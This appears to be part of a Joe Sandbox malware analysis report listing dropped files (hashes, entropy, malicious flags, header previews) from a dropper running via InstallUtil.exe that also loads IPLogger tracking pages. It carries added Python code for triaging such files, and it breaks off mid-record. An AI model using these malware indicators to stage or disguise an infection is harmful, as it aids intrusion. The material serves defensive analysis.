                                                                                                                          SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                          MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                          SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                          SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                          SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                          Malicious:false
                                                                                                                          Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8
                                                                                                                          Entropy (8bit):2.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:PA/:4
                                                                                                                          MD5:7B3B25E28F2B0F1A07E3801B6D5FFA05
                                                                                                                          SHA1:3D1C6C58EF204020517FFE551433F8BE3C6DE023
                                                                                                                          SHA-256:2399E812A70853FDE021C7E64B283AF7D94AAE3D18F261F320C23120249040AE
                                                                                                                          SHA-512:B2FF8CB99CB66F0E12FBDAD5B8A35196CCF9E1531C13C9B66D936A7E4D3930A1551834B984095214C23F6DE6D78717A92DE1F564026FA74E561B295CD49B2A33
                                                                                                                          Malicious:false
                                                                                                                          Preview:...e....
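Size, Entropy (8bit) and the four digests in each record are deterministic functions of the file bytes, so an analyst who pulls a dropped file from the sandbox can recompute them and check the report. The added example below, not Joe Sandbox code, does that in Python. The page does not state the rule behind the Encrypted flag, so the entropy threshold is an assumption chosen to agree with the values shown (7.99 flagged true, 5.42 and lower false). The byte patterns are constructed, not the dropped files: any 4-byte file with three equal bytes and one other has entropy 0.8112781244591328, and the constructed 8-byte pattern reproduces both the entropy 2.0 and the preview "...e...." of the simplewebbuilder.exe records above.

```python
"""Recompute the per-file triage fields of a sandbox dropped-file record.

Added example, not Joe Sandbox code. ENCRYPTED_THRESHOLD is an assumption
(the report does not state its rule); SAMPLE_* inputs are constructed.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

ENCRYPTED_THRESHOLD = 7.9  # assumption; agrees with the report's true/false values


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> Dict[str, str]:
    """Upper-case hex digests under the report's column names."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage(data: bytes) -> Dict[str, object]:
    """Build one record with the same field names the report uses."""
    ent = shannon_entropy(data)
    record: Dict[str, object] = {
        "Size (bytes)": len(data),
        "Entropy (8bit)": ent,
        "Encrypted": ent >= ENCRYPTED_THRESHOLD,
    }
    record.update(digests(data))
    return record


def triage_file(path: str) -> Dict[str, object]:
    """Same record for a file on disk, e.g. a sample downloaded from the sandbox."""
    with open(path, "rb") as fh:
        return triage(fh.read())


SAMPLE_4 = b"\x00\x00\x00\x01"               # constructed: three equal bytes + one other
SAMPLE_8 = b"\x00\x00\x00e\x00\x01\x02\x03"  # constructed: 4x 0x00 plus four singletons
SAMPLE_FLAT = bytes(range(256)) * 16         # constructed: flat distribution, entropy 8.0

if __name__ == "__main__":
    for label, blob in [("4-byte", SAMPLE_4), ("8-byte", SAMPLE_8), ("flat", SAMPLE_FLAT)]:
        rec = triage(blob)
        print(label, rec["Size (bytes)"], round(rec["Entropy (8bit)"], 6),
              rec["Encrypted"], rec["MD5"])
```

Comparing the recomputed SHA-256 with the report's value is the quickest way to confirm that the file retrieved from the sandbox is the one the record describes; a mismatch usually means the sandbox captured a different write to the same path.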
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69211
                                                                                                                          Entropy (8bit):7.995787876711886
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                                                                                                                          MD5:753DF6889FD7410A2E9FE333DA83A429
                                                                                                                          SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                                                                                                                          SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                                                                                                                          SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                                                                                                                          Malicious:true
                                                                                                                          Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):330
                                                                                                                          Entropy (8bit):3.124976752232777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:kK6DlTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:Ol8kPlE99SNxAhUe1HEVo
                                                                                                                          MD5:E8063FE3CAA09B21949A4F5A1E48B78F
                                                                                                                          SHA1:2846FFA6654DEBFDF823380B2EF4D2D1F03636D5
                                                                                                                          SHA-256:68B6F5D8A509715B34E7B055CF8D45AFCB2A0D38EAF96DCEA67C20550EFEE5F7
                                                                                                                          SHA-512:BE229523C0E176418DF5A81C299CF0DF2B3F652489AFE801FE281E47BC2DA18B5B58DEC5FFD24FB33A42AD173836FA56FE8BF6AA728A82754C5EC7262736ED85
                                                                                                                          Malicious:false
                                                                                                                          Preview:p...... ..........P.Ut..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...
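A caveat on the two file.exe records above: authroot.stl is Microsoft's authroot certificate trust list, which CryptoAPI downloads from ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab when a process builds a certificate chain, and the 330-byte record carries exactly that URL with an ETag-style tag. The CAB is therefore a side effect of the dropper validating a certificate (a TLS connection or a signature check), not a payload it carried; the report marks it Malicious:true because file.exe is the process that wrote it. The added example below, not part of the Joe Sandbox report, parses the CFHEADER, CFFOLDER and CFFILE structures of a cabinet and recovers the same facts libmagic printed in the File Type line (69211 bytes, the CFFILE table at 0x2c, one file "authroot.stl" with the archive attribute, 6 data blocks, compression type 0x1 = MSZIP), so a dropped CAB can be triaged without extracting it. The header returned by build_sample_header() is constructed from the values in the report; its cbFile, date and time fields are placeholders, and the data blocks are omitted, so the parser reports it as truncated.

```python
"""Parse the metadata structures of a Microsoft Cabinet (MS-CAB) file.

Added example, not Joe Sandbox code. Layout per the MS-CAB specification,
all fields little-endian. build_sample_header() is a constructed header.
"""
import struct
from dataclasses import dataclass, field
from typing import List, Tuple

CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # 36 bytes
CFFOLDER = struct.Struct("<IHH")              # 8 bytes (+ optional per-folder reserve)
CFFILE = struct.Struct("<IIHHHH")             # 16 bytes, then a NUL-terminated name
FLAG_RESERVE_PRESENT = 0x0004
COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}
ATTRIB_ARCHIVE = 0x20
ATTRIB_NAME_IS_UTF = 0x80


@dataclass
class CabFile:
    name: str
    size: int       # uncompressed size (cbFile)
    folder: int     # index into CabInfo.folders
    attribs: int
    date: str
    time: str


@dataclass
class CabInfo:
    cabinet_size: int
    files_offset: int
    version: Tuple[int, int]
    truncated: bool
    folders: List[Tuple[int, int, str]] = field(default_factory=list)  # (coffCabStart, cCFData, type)
    files: List[CabFile] = field(default_factory=list)


def dos_date(v: int) -> str:
    """DOS packed date: bits 15-9 years since 1980, 8-5 month, 4-0 day."""
    return f"{1980 + (v >> 9):04d}-{(v >> 5) & 0x0F:02d}-{v & 0x1F:02d}"


def dos_time(v: int) -> str:
    """DOS packed time: bits 15-11 hour, 10-5 minute, 4-0 seconds/2."""
    return f"{v >> 11:02d}:{(v >> 5) & 0x3F:02d}:{(v & 0x1F) * 2:02d}"


def parse_cab_header(data: bytes) -> CabInfo:
    if len(data) < CFHEADER.size or data[:4] != b"MSCF":
        raise ValueError("not a Microsoft Cabinet (missing MSCF signature)")
    (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(data, 0)
    pos = CFHEADER.size
    folder_reserve = 0
    try:
        if flags & FLAG_RESERVE_PRESENT:
            cb_hdr_res, folder_reserve, _cb_data_res = struct.unpack_from("<HBB", data, pos)
            pos += 4 + cb_hdr_res
        info = CabInfo(cb_cabinet, coff_files, (ver_major, ver_minor), len(data) < cb_cabinet)
        for _ in range(c_folders):
            start, n_blocks, ctype = CFFOLDER.unpack_from(data, pos)
            pos += CFFOLDER.size + folder_reserve
            info.folders.append((start, n_blocks, COMPRESSION.get(ctype & 0x0F, hex(ctype))))
        if pos != coff_files:
            raise ValueError(f"CFFILE table expected at {pos:#x}, header says {coff_files:#x}")
        for _ in range(c_files):
            cb, _uoff, ifolder, date, time, attr = CFFILE.unpack_from(data, pos)
            pos += CFFILE.size
            end = data.index(b"\x00", pos)  # ValueError if the name is unterminated
            enc = "utf-8" if attr & ATTRIB_NAME_IS_UTF else "latin-1"
            info.files.append(CabFile(data[pos:end].decode(enc, "replace"), cb, ifolder,
                                      attr, dos_date(date), dos_time(time)))
            pos = end + 1
    except struct.error as exc:
        raise ValueError("cabinet header truncated") from exc
    return info


def build_sample_header() -> bytes:
    """Constructed header matching the report's File Type line; no CFDATA blocks."""
    name = b"authroot.stl\x00"
    header = CFHEADER.pack(b"MSCF", 0, 69211, 0, 0x2C, 0, 3, 1, 1, 1, 0, 0, 0)
    folder = CFFOLDER.pack(73, 6, 1)  # first block right after CFFILE: 36 + 8 + 16 + 13 = 73
    # cbFile, date and time are placeholders; attribs 0x20 is the archive bit (+A)
    cffile = CFFILE.pack(0x2A000, 0, 0, 0x5745, 0x5250, ATTRIB_ARCHIVE)
    return header + folder + cffile + name


if __name__ == "__main__":
    info = parse_cab_header(build_sample_header())
    print(info.cabinet_size, hex(info.files_offset), info.version, info.folders, info.truncated)
    for f in info.files:
        print(f"{f.name}: {f.size} bytes, folder {f.folder}, attribs {f.attribs:#x}, {f.date} {f.time}")
```

For a real CAB from a case, parse_cab_header(open(path, "rb").read()) lists the contained names before anything is extracted; a cabinet whose single entry is authroot.stl, written by a process that just made a TLS connection, is the CryptoAPI download described above rather than a second-stage archive.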
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4283784
                                                                                                                          Entropy (8bit):7.981853182461957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                          MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                          SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                          SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
